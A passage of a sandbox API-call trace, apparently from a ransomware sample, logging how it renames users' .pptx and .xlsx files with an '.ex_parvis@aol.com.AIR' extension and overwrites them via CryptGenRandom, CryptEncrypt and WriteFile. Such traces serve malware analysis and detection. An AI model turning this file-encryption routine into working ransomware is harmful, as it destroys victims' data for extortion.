lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OV-wsJ1ouPCLOQXSQ.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OV-wsJ1ouPCLOQXSQ.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OV-wsJ1ouPCLOQXSQ.pptx" [0160.950] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OV-wsJ1ouPCLOQXSQ.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OV-wsJ1ouPCLOQXSQ.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OV-wsJ1ouPCLOQXSQ.pptx.12781717671972518758.ex_parvis@aol.com.AIR" [0160.950] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OV-wsJ1ouPCLOQXSQ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ov-wsj1oupcloqxsq.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OV-wsJ1ouPCLOQXSQ.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ov-wsj1oupcloqxsq.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.952] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OV-wsJ1ouPCLOQXSQ.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ov-wsj1oupcloqxsq.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.952] GetProcessHeap () returned 0x2e0000 [0160.952] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0160.952] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=67059) returned 1 [0160.953] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x105f3 [0160.953] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.953] GetProcessHeap () returned 0x2e0000 [0160.953] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.953] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.953] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.954] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.954] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.954] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x105f3) returned 0x3ac410 [0160.954] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x105f3) returned 0x30d0048 [0160.954] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.954] ReadFile (in: hFile=0x394, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x105f3, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x105f3, lpOverlapped=0x0) returned 1 [0160.955] SetFilePointer (in: hFile=0x394, lDistanceToMove=-67059, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.955] WriteFile (in: hFile=0x394, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x105f3, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x105f3, lpOverlapped=0x0) returned 1 [0160.957] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.957] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.957] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O9_F9.xlsx", dwFileAttributes=0x80) returned 1 [0160.957] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O9_F9.xlsx") returned 51 [0160.957] GetProcessHeap () returned 0x2e0000 [0160.957] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xcc) returned 0x3470a0 [0160.957] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O9_F9.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O9_F9.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O9_F9.xlsx" [0160.957] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O9_F9.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O9_F9.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O9_F9.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" [0160.957] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O9_F9.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\o9_f9.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O9_F9.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\o9_f9.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.959] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\O9_F9.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\o9_f9.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.959] GetProcessHeap () returned 0x2e0000 [0160.959] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0160.959] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=92465) returned 1 [0160.959] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x16931 [0160.959] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.959] GetProcessHeap () returned 0x2e0000 [0160.959] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.959] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.960] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.960] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.960] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.960] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x16931) returned 0x3ac410 [0160.961] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x16931) returned 0x30d0048 [0160.961] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.961] ReadFile (in: hFile=0x394, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x16931, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x16931, lpOverlapped=0x0) returned 1 [0160.962] SetFilePointer (in: hFile=0x394, lDistanceToMove=-92465, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.963] WriteFile (in: hFile=0x394, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x16931, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x16931, lpOverlapped=0x0) returned 1 [0160.964] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.964] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.964] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nHf6.xlsx", dwFileAttributes=0x80) returned 1 [0160.965] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nHf6.xlsx") returned 50 [0160.965] GetProcessHeap () returned 0x2e0000 [0160.965] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xca) returned 0x3470a0 [0160.965] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nHf6.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nHf6.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nHf6.xlsx" [0160.965] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nHf6.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nHf6.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nHf6.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" [0160.965] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nHf6.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhf6.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nHf6.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhf6.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.968] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nHf6.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhf6.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.968] GetProcessHeap () returned 0x2e0000 [0160.968] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0160.968] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=36115) returned 1 [0160.968] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x8d13 [0160.968] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.968] GetProcessHeap () returned 0x2e0000 [0160.968] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.968] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.969] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.969] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.969] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.970] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8d13) returned 0x3ac410 [0160.970] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8d13) returned 0x3b5130 [0160.970] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.970] ReadFile (in: hFile=0x394, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x8d13, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x8d13, lpOverlapped=0x0) returned 1 [0160.971] SetFilePointer (in: hFile=0x394, lDistanceToMove=-36115, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.971] WriteFile (in: hFile=0x394, lpBuffer=0x3b5130*, nNumberOfBytesToWrite=0x8d13, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b5130*, lpNumberOfBytesWritten=0x2acf9c8*=0x8d13, lpOverlapped=0x0) returned 1 [0160.972] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.972] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.972] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M-gSy_kIi1Eao0JzZFv.pptx", dwFileAttributes=0x80) returned 1 [0160.973] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M-gSy_kIi1Eao0JzZFv.pptx") returned 65 [0160.973] GetProcessHeap () returned 0x2e0000 [0160.973] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe8) returned 0x3a7428 [0160.973] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M-gSy_kIi1Eao0JzZFv.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M-gSy_kIi1Eao0JzZFv.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M-gSy_kIi1Eao0JzZFv.pptx" [0160.973] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M-gSy_kIi1Eao0JzZFv.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M-gSy_kIi1Eao0JzZFv.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M-gSy_kIi1Eao0JzZFv.pptx.12781717671972518758.ex_parvis@aol.com.AIR" [0160.973] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M-gSy_kIi1Eao0JzZFv.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m-gsy_kii1eao0jzzfv.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M-gSy_kIi1Eao0JzZFv.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m-gsy_kii1eao0jzzfv.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.976] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M-gSy_kIi1Eao0JzZFv.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m-gsy_kii1eao0jzzfv.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.976] GetProcessHeap () returned 0x2e0000 [0160.976] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0160.976] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=61407) returned 1 [0160.977] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xefdf [0160.977] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.977] GetProcessHeap () returned 0x2e0000 [0160.977] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.977] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.977] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.978] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.978] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.978] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xefdf) returned 0x3ac410 [0160.978] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xefdf) returned 0x30d0048 [0160.979] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.979] ReadFile (in: hFile=0x394, lpBuffer=0x3ac410, nNumberOfBytesToRead=0xefdf, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0xefdf, lpOverlapped=0x0) returned 1 [0160.980] SetFilePointer (in: hFile=0x394, lDistanceToMove=-61407, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.980] WriteFile (in: hFile=0x394, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0xefdf, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0xefdf, lpOverlapped=0x0) returned 1 [0160.981] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.981] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.981] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JPZY0v5 sNowOytYe0.pptx", dwFileAttributes=0x80) returned 1 [0160.981] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JPZY0v5 sNowOytYe0.pptx") returned 64 [0160.981] GetProcessHeap () returned 0x2e0000 [0160.981] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe6) returned 0x3a7428 [0160.981] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JPZY0v5 sNowOytYe0.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JPZY0v5 sNowOytYe0.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JPZY0v5 sNowOytYe0.pptx" [0160.981] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JPZY0v5 sNowOytYe0.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JPZY0v5 sNowOytYe0.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JPZY0v5 sNowOytYe0.pptx.12781717671972518758.ex_parvis@aol.com.AIR" [0160.981] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JPZY0v5 sNowOytYe0.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jpzy0v5 snowoytye0.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JPZY0v5 sNowOytYe0.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jpzy0v5 snowoytye0.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.983] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JPZY0v5 sNowOytYe0.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jpzy0v5 snowoytye0.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.983] GetProcessHeap () returned 0x2e0000 [0160.983] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0160.984] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=92085) returned 1 [0160.984] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x167b5 [0160.984] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.984] GetProcessHeap () returned 0x2e0000 [0160.984] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.984] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.984] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.985] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.985] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.985] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x167b5) returned 0x3ac410 [0160.985] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x167b5) returned 0x30d0048 [0160.985] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.985] ReadFile (in: hFile=0x394, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x167b5, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x167b5, lpOverlapped=0x0) returned 1 [0160.986] SetFilePointer (in: hFile=0x394, lDistanceToMove=-92085, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.986] WriteFile (in: 